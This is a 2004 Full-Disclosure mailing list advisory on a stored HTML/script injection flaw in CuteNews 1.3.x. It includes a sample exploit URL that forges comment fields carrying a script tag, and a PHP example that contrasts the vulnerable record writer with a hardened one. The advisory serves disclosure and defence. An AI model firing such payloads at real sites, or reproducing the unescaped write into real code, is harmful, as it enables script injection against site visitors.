[Full-Disclosure] injection html CuteNews

From: DarkBicho (darkbichofastmail.fm)
Date: Sun Jul 18 2004 - 05:11:19 CDT


Original Advisory: http://www.darkbicho.iberhosting.net/advisory-11.txt

-------------------------------------------------------------------------------------------------

                            :.: injection html CuteNews :.:

  PROGRAM: CuteNews
  HOMEPAGE: http://cutephp.com/
  VERSION: v1.3.x
  BUG: injection html
  DATE: 15/07/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbichoperu.com

-------------------------------------------------------------------------------------------------

1.- Affected software description:
    -----------------------------

    CuteNews is a popular news publishing system, written in PHP by
    CutePHP.

2.- vulnerability:
    ---------------

    HTML injection in comments

    /inc/Shows.inc.php

    Line: 189

    if(!$found){ fwrite($new_comments,
    "$id|>|$time|$name|$mail|$ip|$comments||\n"); }

    The variable $id is not filtered. Comments are stored one per line with
    "|" as the field separator, so an id value that itself contains "|" is
    written as extra fields of the record, and the comment display then
    renders the injected HTML.

    HTML injection

    id of the news item = 1078525267

    Example:

    show_news.php?subaction=addcomment&name=DarkBich0&comments=http://www.darkbicho.tk&id=1078525267|>|1090074219|DarkBich0|none|127.0.0.1|<script>alert("DarkBicho");</script>||
   
 
    :.: http://www.darkbicho.iberhosting.net/cutenews/cutenews.gif :.:
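    The defect described above and one way to close it, as an added PHP example that is not CuteNews code: the record is built first in the shape the advisory quotes, then by a hardened function that validates the id and rejects separator characters before anything is written. Function names, the sample request values and the PHP 8 requirement are assumptions.

```php
<?php
// Added example (not CuteNews code): why an unfiltered $id lets one request forge
// extra fields in the pipe-delimited comment record, plus a hardened builder.

// Same shape as the line quoted from Shows.inc.php: fields are joined with
// "|" and nothing stops a field from itself containing "|" or a newline.
function build_record_vulnerable(string $id, string $time, string $name,
                                 string $mail, string $ip, string $comments): string
{
    return "$id|>|$time|$name|$mail|$ip|$comments||\n";
}

// Hardened: numeric fields must be plain digits, no field may carry the
// separator or a line break, and user text is HTML-encoded before storage
// so a display path that forgets to escape still cannot run script.
function build_record_hardened(string $id, string $time, string $name,
                               string $mail, string $ip, string $comments): string
{
    if (!ctype_digit($id) || !ctype_digit($time)) {
        throw new InvalidArgumentException('id and time must be numeric');
    }
    $fields = [$name, $mail, $ip, $comments];
    foreach ($fields as $f) {
        if (preg_match('/[|\r\n]/', $f)) {
            throw new InvalidArgumentException('field contains "|" or newline');
        }
    }
    [$name, $mail, $ip, $comments] = array_map(
        fn(string $s): string => htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), $fields);
    return "$id|>|$time|$name|$mail|$ip|$comments||\n";
}

// Constructed input mirroring the advisory's request: the "id" parameter
// carries a whole forged record tail that ends in a script tag.
$forgedId = '1078525267|>|1090074219|DarkBich0|none|127.0.0.1'
          . '|<script>alert("DarkBicho");</script>||';
$args = [$forgedId, '1090074219', 'DarkBich0', 'none', '127.0.0.1', 'http://example.invalid'];

$record = build_record_vulnerable(...$args);
// The stored line now splits into many more fields than a normal record,
// and one of them is raw HTML that the comment display prints verbatim.
$count = count(explode('|', rtrim($record, "\n")));
printf("vulnerable: %d fields, script stored: %s\n",
       $count, str_contains($record, '<script>') ? 'yes' : 'no');

try {
    build_record_hardened(...$args);
} catch (InvalidArgumentException $e) {
    echo "hardened: rejected, " . $e->getMessage() . "\n";
}
```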

3.- Exploit:
    --------

    http://www.darkbicho.iberhosting.net/cutenews/

4.- SOLUTION:
    ---------
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon.
    Check the CuteNews website for updates and official release details.

5.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "PISCO IS AND ALWAYS WILL BE PERUVIAN"

6.- Contact
    -------

        WEB: http://www.darkbicho.tk
        EMAIL: darkbichoperu.com

-------------------------------------------------------------------------------------------------
                                Security Wari Projects
                                  (c) 2002 - 2004
                                    Made in Peru

----------------------------------------[ EOF ]----------------------------------------------
DarkBicho
Web: http://www.darkbicho.tk
"My only crime is seeing what others cannot see"

---------------------- The End ----------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html